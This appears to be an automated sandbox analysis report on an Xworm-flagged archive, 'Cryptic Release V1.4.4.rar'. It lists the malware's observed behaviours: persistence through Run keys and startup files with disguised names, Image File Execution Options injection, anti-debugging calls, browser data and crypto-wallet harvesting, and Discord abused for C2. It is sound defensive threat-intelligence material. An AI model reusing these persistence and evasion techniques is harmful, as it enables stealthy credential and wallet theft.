Analysis Overview
SHA256
d9b85302923cf4d3f70ed1cc6ffd9823005c5020ab89d0bf2d7614f86e412008
Threat Level: Known bad
The file Cryptic Release V1.4.4.rar was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Event Triggered Execution: Image File Execution Options Injection
Downloads MZ/PE file
Reads user/profile data of web browsers
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
Checks computer location settings
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks system information in the registry
Drops file in Program Files directory
Detects Pyinstaller
Command and Scripting Interpreter: PowerShell
Unsigned PE
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious behavior: AddClipboardFormatListener
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-20 18:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1808s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Cryptic Release V1.4.4\Cryptic Release V1.4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AIM\RuntimeBroker\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\dllhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Service.exe | C:\Users\Admin\AppData\Local\Temp\oknssj.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Service.exe | C:\Users\Admin\AppData\Local\Temp\oknssj.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_5936_133633812782488386\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_5936_133633812782488386\svchost.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\dllhost.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\LegacyRbxGui\Asphalt.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\MenuBar\divider.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\icons\ic-search-gray.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\AnimationEditor\icon_whitetriangle_up.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ManageCollaborators\closeWidget_light.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\StudioToolbox\package_dark.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\sky\cloudDetail3D-bc4.dds | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\sounds\action_get_up.mp3 | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VoiceChat\SpeakerDark\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\icons\ic-more-profile.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\icons\ic-more-message.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.61\VisualElements\LogoCanary.png | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\configs\DateTimeLocaleConfigs\es-mx.json | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\fonts\Oswald-Bold.ttf | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\TerrainTools\icon_regions_fill.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\DevConsole\Info.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Emotes\EmotesRadialIcon.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\StudioToolbox\Voting\thumbs-up-white.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Controls\DesignSystem\ButtonY.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\graphic\gr-indicator-instudio-14x14.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\Trust Protection Lists\Sigma\Staging | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.61\Locales\id.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\fonts\NotoSansBengaliUI-Regular.ttf | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\Debugger\Breakpoints\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\StudioToolbox\AssetPreview\audioPlay_BG.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\graphic\Auth\logo_white_1x.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\msedgeupdateres_bn-IN.dll | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\StudioToolbox\AssetConfig\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Settings\Radial\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VR\rectBackgroundWhite.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\msedge.exe.sig | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\TopBar\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Slider-BKG-Left-Cap.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VoiceChat\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaChat\icons\ic-game.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\identity_proxy\dev.identity_helper.exe.manifest | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\StudioToolbox\AssetConfig\selected.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\TerrainTools\mtrl_air.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\TerrainTools\mtrl_limestone_2022.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\AnimationEditor\image_keyframe_bounce_selected.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\graphic\noconnection.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VoiceChat\SpeakerNew\Unmuted60.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\Locales\nn.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\Trust Protection Lists\Mu\LICENSE | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.61\Locales\tr.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\sky\sun.jpg | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\AnimationEditor\ic-checkbox-active.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\Debugger\Breakpoints\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\fonts\JosefinSans-Regular.ttf | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\chatBubble_red_notify_bkg.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VoiceChat\MicDark\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\VoiceChat\SpeakerLight\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\TerrainTools\button_arrow.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\TerrainTools\icon_flatten_erode.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Chat\ToggleChatFlip.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\Settings\Players\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\content\textures\ui\TopBar\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\ExtraContent\textures\ui\LuaApp\icons\ic-more-my-feed.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | N/A | N/A |
